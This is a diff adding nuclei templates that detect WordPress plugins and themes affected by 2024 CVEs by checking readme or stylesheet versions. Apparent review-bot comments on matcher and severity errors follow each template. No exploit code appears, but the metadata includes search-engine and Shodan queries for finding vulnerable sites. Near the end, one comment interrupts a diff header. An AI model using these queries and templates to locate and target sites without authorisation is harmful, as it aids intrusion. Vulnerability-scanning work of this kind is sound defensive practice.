diff --git a/poc/cve/CVE-2024-43244-939e704d270328b1ff062eb9844d75b2.yaml b/poc/cve/CVE-2024-43244-939e704d270328b1ff062eb9844d75b2.yaml new file mode 100644 index 0000000000..056961e045 --- /dev/null +++ b/poc/cve/CVE-2024-43244-939e704d270328b1ff062eb9844d75b2.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43244-939e704d270328b1ff062eb9844d75b2 + +info: + name: > + Houzez <= 3.2.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Houzez theme for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 3.2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ceaa52e-564d-4454-8e3b-dc6899c910dd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43244 + metadata: + fofa-query: "wp-content/themes/houzez/" + google-query: inurl:"/wp-content/themes/houzez/" + shodan-query: 'vuln:CVE-2024-43244' + tags: cve,wordpress,wp-theme,houzez,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/houzez/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "houzez" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.4') \ No newline at end of file 
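Review bot: The `word` matcher looks for lowercase `houzez` in `style.css`, but nuclei word matchers are case-sensitive by default and a theme header typically writes `Theme Name: Houzez`; the match then depends on a lowercase occurrence such as `Text Domain: houzez` or a URL happening to be present. Add `case-insensitive: true` to that matcher, or match on the `Theme Name:` line. Child themes are common for this theme; the parent `style.css` at the path used here stays reachable so the check still works, and the `Version:` it extracts is the parent's, which is the one that matters.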
diff --git a/poc/cve/CVE-2024-43245-3fc6d2c3f5750fb0be80ffc0c8d01f2d.yaml b/poc/cve/CVE-2024-43245-3fc6d2c3f5750fb0be80ffc0c8d01f2d.yaml new file mode 100644 index 0000000000..9c4f91cdcd --- /dev/null +++ b/poc/cve/CVE-2024-43245-3fc6d2c3f5750fb0be80ffc0c8d01f2d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43245-3fc6d2c3f5750fb0be80ffc0c8d01f2d + +info: + name: > + JobSearch <= 2.3.4 - Authentication Bypass to Account Takeover + author: topscoder + severity: critical + description: > + The JobSearch WP Job Board plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.3.4. This is due to the plugin not properly validating identity on login functionality. This makes it possible for unauthenticated attackers to gain access to accounts they should not have access to. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7250da0a-1ac6-48a6-a480-0721d604add3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43245 + metadata: + fofa-query: "wp-content/plugins/wp-jobsearch/" + google-query: inurl:"/wp-content/plugins/wp-jobsearch/" + shodan-query: 'vuln:CVE-2024-43245' + tags: cve,wordpress,wp-plugin,wp-jobsearch,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-jobsearch/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-jobsearch" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.4') \ No newline at end of file 
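Review bot: A 9.8 authentication-bypass template whose only check is `compare_versions(version, '<= 2.3.4')` on the readme `Stable tag` should say so, otherwise a hit reads as a confirmed account takeover. Add `verified: false` under `metadata` or a sentence in the description (`Version-based detection via readme.txt; the login bypass is not exercised.`). If WP JobSearch is distributed outside wordpress.org, also confirm that its package actually ships `readme.txt` with a `Stable tag:` line; if not, the regex never matches and the template is a no-op.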
diff --git a/poc/cve/CVE-2024-43246-e4931f33e22f3b0d81b8bf3466c11868.yaml b/poc/cve/CVE-2024-43246-e4931f33e22f3b0d81b8bf3466c11868.yaml new file mode 100644 index 0000000000..fb7e57c898 --- /dev/null +++ b/poc/cve/CVE-2024-43246-e4931f33e22f3b0d81b8bf3466c11868.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43246-e4931f33e22f3b0d81b8bf3466c11868 + +info: + name: > + WHMpress <= 6.2-revision-5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WHMpress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 6.2-revision-5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5dea4293-0496-4cee-9d8a-c15beaa51b14?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43246 + metadata: + fofa-query: "wp-content/plugins/whmpress/" + google-query: inurl:"/wp-content/plugins/whmpress/" + shodan-query: 'vuln:CVE-2024-43246' + tags: cve,wordpress,wp-plugin,whmpress,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "whmpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.2-revision-5') \ No newline at end of file 
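Review bot: The version regex `([0-9.]+)` can never capture `6.2-revision-5`; on an affected install that reports `Stable tag: 6.2-revision-5` the extractor yields `6.2`, and `compare_versions('6.2', '<= 6.2-revision-5')` is then evaluated with a pre-release-style string on the right. In semver ordering `6.2-revision-5` sorts below `6.2`, so the comparison is likely false and the exact affected version is missed; confirm with nuclei's `compare_versions`. Widen the capture to keep the suffix, e.g. `([0-9.]+(?:-revision-[0-9]+)?)`, and check how the fixed release is tagged so the boundary is right.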
diff --git a/poc/cve/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml b/poc/cve/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml new file mode 100644 index 0000000000..16a787d620 --- /dev/null +++ b/poc/cve/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43247-0624f0bab17c71db9707db1533c1022b + +info: + name: > + WHMpress <= 6.2-revision-5 - Missing Authorization to Authenticated (Subscriber+) Settings Update + author: topscoder + severity: low + description: > + The WHMpress - WHMCS WordPress Integration Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 6.2-revision-5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d264e88-7137-48ff-8ce3-5fff77e2474a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43247 + metadata: + fofa-query: "wp-content/plugins/whmpress/" + google-query: inurl:"/wp-content/plugins/whmpress/" + shodan-query: 'vuln:CVE-2024-43247' + tags: cve,wordpress,wp-plugin,whmpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "whmpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.2-revision-5') \ No newline at end of file 
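Review bot: `compare_versions(version, '<= 6.2-revision-5')` receives a version stripped to `6.2` by the `([0-9.]+)` capture, and a `-revision-N` suffix on the right-hand side is treated as a pre-release that sorts below `6.2`, so the affected release itself may not match; verify against nuclei's comparison and keep the suffix in the capture group (`([0-9.]+(?:-revision-[0-9]+)?)`). Separately, `severity: low` and the `low` tag do not match the 4.3 score, which is CVSS Medium.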
diff --git a/poc/cve/CVE-2024-43248-02766ce7753cfbf027f4bd7e7c8beefa.yaml b/poc/cve/CVE-2024-43248-02766ce7753cfbf027f4bd7e7c8beefa.yaml new file mode 100644 index 0000000000..d726b7c130 --- /dev/null +++ b/poc/cve/CVE-2024-43248-02766ce7753cfbf027f4bd7e7c8beefa.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43248-02766ce7753cfbf027f4bd7e7c8beefa + +info: + name: > + Bit Form Pro <= 2.6.4 - Unauthenticated Arbitrary File Deletion + author: topscoder + severity: critical + description: > + The Bit Form Pro plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in all versions up to, and including, 2.6.4. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7a09288c-b8de-4674-9f96-d26ff3c7d917?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43248 + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:CVE-2024-43248' + tags: cve,wordpress,wp-plugin,bitformpro,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file 
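Review bot: This is flagged `critical` (unauthenticated file deletion leading to RCE) but the template only reads `/wp-content/plugins/bitformpro/readme.txt`; Bit Form Pro appears to be the paid tier of Bit Form, so confirm the paid package actually contains `readme.txt` with a `Stable tag:` header, because if it does not the regex never matches and the template is dead weight. The `word` matcher additionally requires the literal `bitformpro` in that readme, which is not guaranteed. State in the description that detection is version-based and does not exercise the deletion functionality.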
diff --git a/poc/cve/CVE-2024-43249-9332e35d2ca00b85ffd1d6c5886e63ec.yaml b/poc/cve/CVE-2024-43249-9332e35d2ca00b85ffd1d6c5886e63ec.yaml new file mode 100644 index 0000000000..2781169a3a --- /dev/null +++ b/poc/cve/CVE-2024-43249-9332e35d2ca00b85ffd1d6c5886e63ec.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43249-9332e35d2ca00b85ffd1d6c5886e63ec + +info: + name: > + Bit Form Pro <= 2.6.4 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The Bit Form Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 2.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6d3b9d15-f6a9-4d1c-ada5-8c48add839a2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43249 + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:CVE-2024-43249' + tags: cve,wordpress,wp-plugin,bitformpro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file 
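Review bot: `severity: low` and the `low` tag contradict the 8.8 score (`PR:L/C:H/I:H/A:H`) on the lines just above and the description, which is subscriber-level arbitrary file upload with possible RCE; that is CVSS High. Set `severity: high` and fix the tag so consumers filtering on severity see it. Detection remains a readme Stable-tag check, so the finding still needs manual confirmation before it is treated as an upload path.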
diff --git a/poc/cve/CVE-2024-43250-9c99a7674eaede7a5abac359a81cf9bb.yaml b/poc/cve/CVE-2024-43250-9c99a7674eaede7a5abac359a81cf9bb.yaml new file mode 100644 index 0000000000..e711939f1c --- /dev/null +++ b/poc/cve/CVE-2024-43250-9c99a7674eaede7a5abac359a81cf9bb.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43250-9c99a7674eaede7a5abac359a81cf9bb + +info: + name: > + Bit Form Pro <= 2.6.4 - Missing Authorization to Authenticated (Subscriber+) Settings Update + author: topscoder + severity: low + description: > + The Bit Form Pro plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/525a2180-3643-4f78-aafd-99a546bac363?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43250 + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:CVE-2024-43250' + tags: cve,wordpress,wp-plugin,bitformpro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file 
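Review bot: `severity: low` sits next to an 8.8 `C:H/I:H/A:H` vector for what the description calls a subscriber-level settings update; the WHMpress settings-update template in this same commit carries `C:N/I:L/A:N` (4.3) for the same class of bug, so one of these two vectors is probably copied from the wrong record. Check the Wordfence entry in `reference` and make `severity`, `cvss-metrics`, `cvss-score` and the tag agree: if 8.8 is right (settings that lead to code execution), use `severity: high`; if it is a plain settings write, bring the vector down.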
diff --git a/poc/cve/CVE-2024-43251-bdf342d7649c7626a07f0ede9a708ec4.yaml b/poc/cve/CVE-2024-43251-bdf342d7649c7626a07f0ede9a708ec4.yaml new file mode 100644 index 0000000000..bf61558400 --- /dev/null +++ b/poc/cve/CVE-2024-43251-bdf342d7649c7626a07f0ede9a708ec4.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43251-bdf342d7649c7626a07f0ede9a708ec4 + +info: + name: > + Bit Form Pro <= 2.6.4 - Authenticated (Subscriber+) Sensitive Information Exposure + author: topscoder + severity: low + description: > + The bitformpro plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/efa646ee-ebee-4528-a421-09ee3dc8275a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43251 + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:CVE-2024-43251' + tags: cve,wordpress,wp-plugin,bitformpro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file 
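Review bot: The description opens with `The bitformpro plugin for WordPress`, the directory slug rather than the product name used in `name:` (Bit Form Pro), which looks like a generator fallback when the plugin title was missing from the record. Use the product name for consistency with the other Bit Form Pro templates. `severity: low` with a 4.3 score is also CVSS Medium; align it with the score as the other templates should.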
diff --git a/poc/cve/CVE-2024-43252-bc3586df4bd9df275d63c3b38b4b7691.yaml b/poc/cve/CVE-2024-43252-bc3586df4bd9df275d63c3b38b4b7691.yaml new file mode 100644 index 0000000000..641ccac8ab --- /dev/null +++ b/poc/cve/CVE-2024-43252-bc3586df4bd9df275d63c3b38b4b7691.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43252-bc3586df4bd9df275d63c3b38b4b7691 + +info: + name: > + Crew HRM <= 1.1.1 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The Employee, Leave and Recruitment Management System – Crew HRM plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1.1 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc3e3d47-cae3-46a6-9b60-ad1eb6b7ced7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-43252 + metadata: + fofa-query: "wp-content/plugins/hr-management/" + google-query: inurl:"/wp-content/plugins/hr-management/" + shodan-query: 'vuln:CVE-2024-43252' + tags: cve,wordpress,wp-plugin,hr-management,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/hr-management/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "hr-management" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.1') \ No newline at end of file 
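Review bot: `severity: critical` and the `critical` tag do not match the 8.1 / `AC:H` vector two lines above (CVSS High), and the description states that no POP chain is known in the plugin itself. Use `severity: high` and tag `high`. The check is the readme `Stable tag` only, so a match says nothing about whether a gadget chain is present on the target.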
diff --git a/poc/cve/CVE-2024-43253-f0a28b89948b7ce1a9e3b142fc5b96af.yaml b/poc/cve/CVE-2024-43253-f0a28b89948b7ce1a9e3b142fc5b96af.yaml new file mode 100644 index 0000000000..97988cd2af --- /dev/null +++ b/poc/cve/CVE-2024-43253-f0a28b89948b7ce1a9e3b142fc5b96af.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43253-f0a28b89948b7ce1a9e3b142fc5b96af + +info: + name: > + Smart Online Order for Clover <= 1.5.6 - Missing Authorization + author: topscoder + severity: high + description: > + The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/195788de-129e-4112-bcab-a7835c8164ca?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43253 + metadata: + fofa-query: "wp-content/plugins/clover-online-orders/" + google-query: inurl:"/wp-content/plugins/clover-online-orders/" + shodan-query: 'vuln:CVE-2024-43253' + tags: cve,wordpress,wp-plugin,clover-online-orders,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clover-online-orders" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.6') \ No newline at end of file 
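Review bot: `severity: high` and the `high` tag are paired with a 5.3 `C:N/I:L/A:N` score, which is CVSS Medium; the description (`perform an unauthorized action`) is also too vague to justify rating above the score. Set `severity: medium` and the tag to match, or, if the missing capability check permits something that warrants High, say what it is in the description.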
diff --git a/poc/cve/CVE-2024-43254-45b63d56497d30988092c35280a0f346.yaml b/poc/cve/CVE-2024-43254-45b63d56497d30988092c35280a0f346.yaml new file mode 100644 index 0000000000..221d159b9b --- /dev/null +++ b/poc/cve/CVE-2024-43254-45b63d56497d30988092c35280a0f346.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43254-45b63d56497d30988092c35280a0f346 + +info: + name: > + Smart Online Order for Clover <= 1.5.6 - Missing Authorization + author: topscoder + severity: low + description: > + The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/34d990b6-3021-45d4-9ecd-cfabb7fbc96c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43254 + metadata: + fofa-query: "wp-content/plugins/clover-online-orders/" + google-query: inurl:"/wp-content/plugins/clover-online-orders/" + shodan-query: 'vuln:CVE-2024-43254' + tags: cve,wordpress,wp-plugin,clover-online-orders,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clover-online-orders" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.6') \ No newline at end of file 
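Review bot: With `redirects: true` and a `status: 200` matcher, a site whose 404 handler redirects to the front page returns a 200 HTML body for the readme URL; the word matcher `clover-online-orders` can then match on a plugin asset URL in that HTML, and only the `Stable tag` regex (presumably) failing keeps this from being a false positive. Make the check stricter with `redirects: false`, or add a header matcher for the `text/plain` content type a readme.txt is typically served with, so the version regex is not the single line of defence.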
diff --git a/poc/cve/CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d.yaml b/poc/cve/CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d.yaml new file mode 100644 index 0000000000..f0fec03f0c --- /dev/null +++ b/poc/cve/CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d + +info: + name: > + MyBookTable Bookstore <= 3.3.9 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The MyBookTable Bookstore plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.3.9. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update plugin settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b614aab2-a3e3-410a-917b-cc33634503ce?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43255 + metadata: + fofa-query: "wp-content/plugins/mybooktable/" + google-query: inurl:"/wp-content/plugins/mybooktable/" + shodan-query: 'vuln:CVE-2024-43255' + tags: cve,wordpress,wp-plugin,mybooktable,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mybooktable/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mybooktable" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43256-866dd2f4b3efe33271abaa94fe764d76.yaml b/poc/cve/CVE-2024-43256-866dd2f4b3efe33271abaa94fe764d76.yaml new file mode 100644 index 0000000000..2f933d3049 --- /dev/null 
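Review bot: The two `version` extractors run the same regex twice; the `internal: true` copy feeds the DSL and the second exists only to print the value. If the nuclei version this repo targets exposes named extractor values to DSL regardless of `internal`, the second block is redundant and can be dropped; verify, since the pattern is repeated in every template in the commit. Separately, a CSRF that requires tricking an administrator cannot be confirmed by a readme version check, so the description should say the detection is version-based.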
+++ b/poc/cve/CVE-2024-43256-866dd2f4b3efe33271abaa94fe764d76.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43256-866dd2f4b3efe33271abaa94fe764d76 + +info: + name: > + Leopard - WordPress offload media <= 2.0.36 - Missing Authorization to Authenticated (Subscriber+) Settings Update + author: topscoder + severity: low + description: > + The Leopard - WordPress Offload Media plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.0.36. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/35b1fb1a-a12c-4938-a2d2-74e291db76ef?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43256 + metadata: + fofa-query: "wp-content/plugins/leopard-wordpress-offload-media/" + google-query: inurl:"/wp-content/plugins/leopard-wordpress-offload-media/" + shodan-query: 'vuln:CVE-2024-43256' + tags: cve,wordpress,wp-plugin,leopard-wordpress-offload-media,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/leopard-wordpress-offload-media/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "leopard-wordpress-offload-media" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.36') \ No newline at end of file 
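Review bot: The `word` matcher demands the literal `leopard-wordpress-offload-media` inside the readme body; a readme.txt does not necessarily contain its own directory slug, and the `and` condition turns a missing slug into a silent false negative even when the Stable tag is in range. Check the plugin's readme and match on a line it is known to contain (the `=== ... ===` title), or rely on the `Stable tag:` regex alone.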
diff --git a/poc/cve/CVE-2024-43257-2f7a51a2e99eeed0090ae78fd8a6d6c1.yaml b/poc/cve/CVE-2024-43257-2f7a51a2e99eeed0090ae78fd8a6d6c1.yaml new file mode 100644 index 0000000000..31d84f3d2f --- /dev/null +++ b/poc/cve/CVE-2024-43257-2f7a51a2e99eeed0090ae78fd8a6d6c1.yaml 
